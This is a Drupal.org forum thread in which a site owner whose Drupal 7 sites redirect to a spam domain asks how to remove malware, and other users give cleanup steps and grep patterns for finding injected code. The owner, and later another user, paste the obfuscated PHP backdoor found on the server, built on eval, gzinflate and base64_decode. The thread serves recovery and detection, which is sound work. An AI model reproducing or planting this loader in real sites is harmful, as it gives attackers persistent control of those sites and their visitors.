By drupol on

Hello, 

I just visited my site and it takes me to a third party site. This is the third party site address where it takes me to: http://tracesmodern.tk/?number=855-257-7118. I have 3 sites in the account and all have the same problems.

After I try few times, I can visit my site. I talked to hosting company. They want me to buy website security which I cant afford it now. They want me to delete the malware code because they said Feb first week site was hacked. I am not sure where to start and which code to delete. Automatic update was on and not sure why drupal itself also did not prevent it. How can I delete the malware codes?

I will have to search if I have backup before February. I have this sites for few years. This is the first time I had this issue.

Drupal version is 7.22. I guess that also need to be updated. 

Thanks.

Categories: Drupal 7.x

Comments

jaypan’s picture

jaypan
Location Victoria, BC
commented

Once your site is hacked, they install 'backdoors', which can be hard to find. Backdoors are ways to get back into your site even if you remove the original vulnerability.

Your best bet, though unfortunate, will be if you can find a database backup from before it got hacked. Then you will want to do the following:

1) First make a copy of your existing database, and your file system. Even though these are hacked, you want to be able to get back to this point in case you break things and make them worse.

2) Delete core: all files and folders other than the /sites folder.

3) Re-upload Drupal core. Use the newest version.

4) Delete all contributed modules and themes, and re-upload the newest versions of these modules and themes.

5) Go through any custom code (ie - custom modules and/or themes) and look for any code that has been injected into the files.

6) Go through the files folders, both public and private, and look for any files that shouldn't be there. Delete any of these that you find.

7) Upload your pre-hack database backup to the database.

8) Run update.php

Note however that you're best off getting someone who knows Drupal quite well to do this. If you know it fairly well, and have done things like updates and writing code for your site, you should be able to do it, but if someone else has built your site, then you would probably be best off hiring someone to do this.

Contact me to contract me for D7 -> D10/11 migrations.

elpak69’s picture

elpak69 commented

If one site is hack, some things have to happen before. Weak passwords, poor hosting, themes and plugins that have not been updated for years. All of this is a prerequisite for a hacker attack. If you leave the door open the thieves will enter your house right? Update the site to the latest version, update your theme and plugins, change your passwords with a reliable, change your hosting provider with reliable, and you will not have similar issues.

drupol’s picture

drupol commented

Thanks for your answers. 

I had 4 drupal sites and all got hacked. I had other folders not related to drupal. Those were untouched by hackers. 

I have done the following so far.

1. I changed the drupal and database passwords for all.

2. These were old sites. I dont check them regularly. I could not find back up for any. Hosting company keeps last 30 days backup. I restored all sites from last 30 days back up. Less files were infected 30 days ago than today. 

3. I saw multiple php files. Below is content from one file. I deleted all of them where I saw. 

<?php

eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

4. Configuration page shows warning to update drupal security. Updated all for all sites.

I visited all sites in different browsers. I did not see any sites forwarding to external sites. I dont know if the problems were definitely fixed. If I see same issues later then I will follow the step by step guide given by Jaypan. Is there any sort of scanning I can do which will generate a report for me with the list of files which were injected? or perhaps can I search for text "base64" in entire file system? 

Thanks again.

samaphp’s picture

samaphp
Primary language Arabic
Location Riyadh, SA 🇸🇦
commented

Thank you @Jaypan for writing these helpful steps.

I would like to mention important note before deleting the suspected files. That you may look for all files that have have been updated on the same date of the creation/last-update date of the suspected files. Use this Unix command:

find ./ -type f -name "*" -newermt 2018-04-18

I found some common code parts that might be useful to use them to check your folders looking for suspected files on your hacked website:

find . -name 'wp-*'
grep -R '@gzuncompress' .
grep -R ';exit();}' .
grep -R 'create_function' .
grep -R 'base64_decode("' .
grep -R '\[16\].' .
grep -R '<?php           ' .
grep -R 'eval\/\*' .
grep -R '\\157"' .
grep -R '@include' .
grep -R 'x2fh' .
grep -R '<form method="post"' .

At the end make sure to have a look on any PHP file contain eval() and make sure it's a regular file:

grep -R --include=\*.php 'eval(' ./

You might need to change some of these search terms to have an in-depth look.

Note: This will not catch the backdoors 100%. Still, you have to follow @Jaypan steps.

Good luck!

jaypan’s picture

jaypan
Location Victoria, BC
commented

That's a nice set of added comments. That should help someone in the future for sure.

Contact me to contract me for D7 -> D10/11 migrations.

drupol’s picture

drupol commented

My site is at shared hosting. I am not sure how to run unix commands there. Some details will help. If not, I will google to see if I find anything. 

samaphp’s picture

samaphp
Primary language Arabic
Location Riyadh, SA 🇸🇦
commented

You can try to download your project on your machine then trying to find the affected files then remove them from your host.
Also, maybe running some scan checks scripts might help.

zenkul’s picture

zenkul commented 
<?php

eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

and i can not update d8. core

after 1 year no maintenence or update .... >>> SOLVED default.setting.php and setting.php must be updated

mehdi salehi’s picture

mehdi salehi commented

hi my site is hacked my virsion is 8 

pliz help me 

zenkul’s picture

zenkul commented

Search and destroy backdor file and update your drupal